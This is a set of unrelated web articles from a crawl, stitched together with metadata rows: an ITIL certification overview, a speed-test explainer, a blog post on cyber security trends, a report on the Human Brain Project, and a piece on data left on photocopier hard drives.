Thousands of companies of all sizes, and across all industries, currently utilize ITIL. These companies include technology firms, retail giants, entertainment conglomerates, financial services firms, and manufacturers. As a framework, ITIL is easily adaptable to any organization as way to help it achieve desired outcomes.
ITIL training and certification qualifies individuals working for IT service providers to understand best-practices for strategizing, designing, transitioning, operating, and improving IT services that meet the needs of their organizations, users and customers. It also trains IT personnel to understand the need to work together to achieve business outcomes, by enabling business change, managing risk and optimizing customer experience.
An IT department that understands ITIL speaks a common language, understands interdependencies between teams and builds trust in the organization leading to higher probability of meeting goals and objectives.
ITIL training is structured in five certification levels:
Foundation — This is the entry level. It qualifies practitioners in the basics of ITIL elements, concepts, and terminology.
Practitioner — This newly available (as of this week) qualification is designed to improve an individual’s ability to implement ITIL in their organizations.
Intermediate — This level is divided into two modules: Lifecycle and Capability. Each module has a different focus on ITSM and goes more in depth into ITIL aspects.
Expert — This qualification crosses the entire ITIL lifecycle. Credentialed individuals possess “well-rounded, superior knowledge and skills base in ITIL Best practices.”
Master — This level is for individuals who have at least five years of experience in ITSM in leadership or managerial roles. Certification validates an individual’s ability, based on the real-life experiences, to implement all ITIL concepts in an organization.
ITIL-related jobs and careers
As more companies of all sizes adopt and implement ITIL, job opportunities for certified individuals will continue to increase — as will salaries. Almost every job in today’s IT world demands some knowledge in ITIL Foundation, due to the fact that it helps in the communication and understanding of IT processes.
Available jobs for ITIL-certified individuals include just about every IT service delivery position including: Service Desk and Change Management Analysts, System Administrators, Project Managers, Testers, Technical Support Analysts, Service and Business Relationship Managers, ITIL Process Managers, and CIOs. Apart from these roles, ITIL certification can also lead to other opportunities in IT Service Management training and consultancy.
ITIL-certified professional’s typical work day
The single point of contact between providers and users of IT services is the Service Desk. A typical day for a Service Desk Analyst involves handling issues and requests raised by IT users.
ITIL certified professionals will most often be found designing, implementing and operating IT services. Typically they will deal with incidents and disasters as they arise while serving on project teams for new or changed services, or operations teams monitoring services.
Service or Process Managers are generally involved in analysing and reporting on the performance of the IT services or ITIL processes under their domain while Business Relationship Managers regularly liaison with customers to check if they are satisfied with IT services and relaying the same to IT personnel.
More popular outside the United States than inside
There continues to be significant growth in the uptake of ITIL worldwide. Thousands of multi-national organizations are utilizing ITIL including NASA, The Walt Disney Company, UNOPS, the Port of Rotterdam, HP, Microsoft, Proctor & Gamble, and the Australian national government, to name a few.
ITIL is currently more popular outside United States for one simple reason: It originated in the United Kingdom, and has since mostly been adopted by the English-speaking world where, not surprisingly, most U.K. companies have established subsidiaries.
A 2008 survey conducted by Dimension Data asked CIOs to give reasons for not implementing ITIL. The main barriers to wide-scale implementation were twofold: costs in time and money for training and certification, and the limited numbers of ITIL implementers. This seems to indicate that companies who want to follow global standards would most likely implement ITIL by the book. Stand-alone companies, or those working in a dynamic sector, want flexibility and will not look at ITIL because they view it more as instructional rather than as a business framework.
While ITIL hasn’t been as strongly advocated in the United States, implementation is increasing. Although U.S. companies sometimes will not directly say they’ve adopted ITIL word-for-word, investigations show that some of ITIL’s best-practice elements are being regularly implemented on a piecemeal basis. Amazon and eBay, for example, have both pursued this “adopt and adapt” approach.
A quick internet search reveals that an increasing number of American universities and private companies have implemented ITIL, as well as the U.S. Army, Navy and the Internal Revenue Service. It is anticipated that, over time, more U.S. companies will realize the benefits of adopting ITIL for their operations.
ITIL = Work smarter, not harder
ITIL is an internationally recognized set of ITSM best practices, guidelines applicable and adaptable for any organization’s ITSM delivery in a way that best meets business and customer needs.
It’s been said that, “A fool with a tool is still a fool.” Without proper processes, an IT department can buy high-end computing infrastructure and systems, and still fail to help the business meet its objectives. They fail because of a lack of understanding of outcomes and needs, or simply by not working together to deliver proper services.
ITIL solves these problems by enabling certified professionals and departments to see and understand IT needs and requirements from an organizational and customer perspective. | <urn:uuid:84cb86f5-6a1e-4bf5-bfbc-d7bfda1291c6> | CC-MAIN-2017-04 | http://certmag.com/basics-of-itil-why-itil-certification-taking-over-the-world/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281426.63/warc/CC-MAIN-20170116095121-00223-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.937095 | 1,954 | 2.78125 | 3 |
What is the speed of your connection?
What is "download speed" and "upload speed"?
The download speed is how fast you can pull data from the server to you. Most connections are designed to download much faster than they upload, since the majority of on-line activity, like loading web pages or streaming videos, consists of downloads. Download speed is measured in megabits per second (Mbps).
The upload speed is how fast you send data from you to others. Uploading is necessary for sending big files via email, or in using video-chat to talk to someone else on-line (since you have to send your video feed to them). Upload speed is measured in megabits per second (Mbps). | <urn:uuid:756507a5-3e23-466e-9d44-07251a36f40b> | CC-MAIN-2017-04 | http://globalit.com/speed-test | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285315.77/warc/CC-MAIN-20170116095125-00039-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.965526 | 148 | 2.953125 | 3 |
The need to build or rebuild trust, ideological shifts pointing towards cyber war, technology touching all parts of our lives, cultural shifts spawning cyber activism, digital natives and the democratisation of technology in favour of less developed nations. These are all factors that are driving change and that will shape the future cyber environment. We are all now living in a cyber era and things are getting more and more unpredictable. So says Jarno Limnéll, director of cyber security for Intel and a doctor of military science. And I must say that I agree with him.
Here is what we have got in store for us:
Who on earth—and what—can we trust these days?
Stealthy, targeted attacks; reliance on the cloud; virtual money; big data gathering; mass surveillance; the mobile revolution. Technology has changed dramatically. It is now all-pervasive, part and parcel of every aspect of our lives.
We place a great deal of information about ourselves online, but that is a bonus for attackers preparing targeted attacks. We cannot trust that that information will not be used against us. Recent revelations about widespread surveillance means that we cannot really trust that our communications are not being intercepted. Data placed in the cloud can be subpoenaed without our knowledge. There has been talk of creating a European internet to ensure privacy concerns are guarded, which goes against its global nature and the principles on which it was founded.
Trust is the very cornerstone of society—and of business. We need to build safeguards that ensure that information is secure and privacy is respected in order to rebuild the trust that is being eroded. Security needs to be balanced with privacy.
With nation states increasingly being seen as adversaries in the cyber arena, is it inevitable that future wars will be fought with cyber weapons? For many, this would seem to be a low-cost, low-casualty option. Countries in Europe are known to be spending large sums to develop cyber warfare capabilities.
A recent article in the New York Times states that, although the US government has not spoken publicly about its capabilities or willingness to use such weapons, cyber weapons and special forces are two areas seeing growth in a recent budget released by the Pentagon. The first country to strike using such weapons could embolden other countries to do likewise. According to Limnéll, the growth in cyber weapons programmes is a very worrying trend and the only way to control the situation is by reaching an international agreement for cyber arms control.
Today’s always-on world represents a paradigm shift in security and privacy. For too long, technology has been developed first, and then security has been bolted on as it becomes evident that it is necessary. The internet is a prime example of this. It was developed with openness and inclusion in mind—but it has been shown to be manifestly insecure.
The same is true for a host of other technologies that pervade our everyday lives. Now, and into the future, we are envisaging the Internet of Things, where billions of devices become interconnected, accessible over networks. This will include devices such as medical equipment and systems. Researchers have already shown these to be hackable, presenting worrying scenarios regarding the safety of patients. If the promise of the Internet of Things is to become a reality, a rethink is required in terms of security. Instead of bolting it on as an afterthought, it must be built in from the outset.
According to urban legend, bank robber Willie Sutton robbed banks “because that’s where the money is.” Today, the number of physical bank robberies has declined dramatically. Instead, criminals have turned their attention to the internet and associated technology, because that is where the money flows today and it can make for easier pickings. Criminal gangs attacking online targets are forming into organisations with resources that could rival large multinationals.
But motivations go beyond money. Cyberactivism is growing all the time and is something we are going to have to learn to live with. Today’s young people—the so-called Generation Y—are growing up with cyber being part of everything they do. They know no other way. The more pervasive technology continues to become, the more cyber security will become a more personal issue. According to Limnéll, every one of us will need will have cyber rights and responsibilities and these will impact every decision that we make.
According to the United Nations, there will be more Chinese-speaking users of the internet than English by as early as next year. It has also been reported that there are already more mobile phones in use in Africa than in the US and Europe combined. Regions previously seen as remote to those in the Western world will gain in significance, forcing businesses out of their own backyards in order to compete more effectively in fast-growing markets. Cyber security is coming to be more than just about high technology. It will see us having to make changes in the way we behave.
The world is changing and we need to adapt to new realities. At a strategic level, we need to adapt the way we develop policies and make industry and business decisions. At an operational level, we need to consider what kind of security procedures, processes and models we need. And at a technical level, we need to develop new ways of solving security problems technologically.
The cyber era is the new reality and we must evolve old ways of thinking if we are all to prosper. | <urn:uuid:c6b9a64f-c245-4282-9102-186d4ed3f526> | CC-MAIN-2017-04 | http://www.bloorresearch.com/blog/fran-howarth/a-brave-new-pretty-scary-world/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281492.97/warc/CC-MAIN-20170116095121-00067-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.963612 | 1,099 | 2.578125 | 3 |
Henry Markram, the man behind the Human Brain Project (HBP) wants to simulate all known information about the human brain. The project requires heavy investment and has been received with skepticism by some of Markram’s colleagues, but he seems determined that this project will help neuroscientists answer unsolved mysteries about the human brain.
Last week, Nature ran a feature story about Markram, outlining his pitch for HBP, whose goal is to simulate the human brain using a supercomputer. In fact, Markram wants to generate a multi-level simulation of the brain, or as he puts it, “from the genetic level, the molecular level, the neurons and synapses, how microcircuits are formed, macrocircuits, mesocircuits, brain areas — until we get to understand how to link these levels, all the way up to behavior and cognition”. Markram believes such an approach will integrate a lot of disparate research from the neuroscience community under a single model.
A simulation with this much complexity requires a huge amount of computing power, at least an exaflop, Markram believes. Although exascale machines are years away, he makes the argument that neuroscientists should nonetheless be preparing for this level of computing.
According to the Nature report, Markram’s project is competing for a $1.3 billion (€1 billion) pot of money from European Union that will be allocated to two ten-year Flagship initiatives. HBP is one of the six finalists still in the running.
Critics of the Human Brain Project express concerns about a loss of research diversity in the scientific community, and that the level of complexity in this effort could eventually lead to its downfall. Neuroscientists are already running simple models to help discover basic forms of behavior such as pattern recognition and posit that such a detailed model of the brain may end up being no easier to understand than an actual brain. Also, the price tag of the project likely means that funding for HBP would reduce investment in other areas of research.
Despite his detractors, Markram still believes the Human Brain Project is essential to understanding the unsolved mysteries of the brain. “If we don’t have an integrated view, we won’t understand these diseases,” he says in the Nature article.
If HBP fails to receive funding, Markram will continue with this research, albeit at a slower pace, under his “Blue Brain” project, which is the precursor to HBP. In either case, Markram believes that simulation of the brain will move forward, noting that simulation-based research is “an inevitability.”
A project with this much complexity and cost runs a number of risks, but also has the potential to be a game changer in the field of neuroscience. While Markram’s critics may see the project as a threatening to replace their research work, they carry strong arguments regarding the need to maintain scientific diversity and balanced use of funding. | <urn:uuid:a66ceb1d-b6f5-42cf-8804-667a02234110> | CC-MAIN-2017-04 | https://www.hpcwire.com/2012/02/27/exascale_brain_simulation_project_attracts_critics/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00215-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.944799 | 615 | 3.109375 | 3 |
Most people fail to realize that modern, multi-purpose photocopiers contain hard drives that – if not erased when decommissioned – could prove to be a treasure trove of confidential information for a person who knows how to extract it.
We shred hard copies of important documents and we securely wipe the disks on out computers, but rare is the instance when the same is done with the drive of the copy machine, because most people don’t think of it as of a computer – which it in fact is.
“The whole system is controlled by a computer, it has a hard disk. It scans images and they are stored on the disc,” says Graeme Hirst, a computer science professor with the University of Toronto.
That also means that a hacker that knows the password can hack into the photocopier and collect all the data stored on the drive by simply connecting a laptop to the machine and downloading it. Copy machines that are part of an insecure network can be accessed online even by people who don’t know how to hack.
But machines that are leased to companies and that are taken back after a few years can do some serious damage to their former “owners”. Sometimes they are destined for the dump, but they are also often serviced and sold to someone else. According to the Toronto Star, dealers who resell them usually wipe the disks, but there are those who end up directly into the hands of the future user and still contain all the data.
To secure that confidential data doesn’t fall into the wrong hands, the hard drives ought to be physically taken out and purged or even replaced. Since the process is costly and long, clearing the memory and changing the passcodes is also an option.
Lately, Xerox and some other manufacturers of photocopiers have made the process of removing the drive and secure wiping it a lot easier, but the main problem is the fact that most people don’t think about the ramifications of their everyday use of technology. | <urn:uuid:0d1e59c6-96db-4815-85cb-bf2bdd29cc8d> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2010/03/29/office-photocopiers-brimming-with-corporate-secrets/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280239.54/warc/CC-MAIN-20170116095120-00123-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.967443 | 414 | 2.8125 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.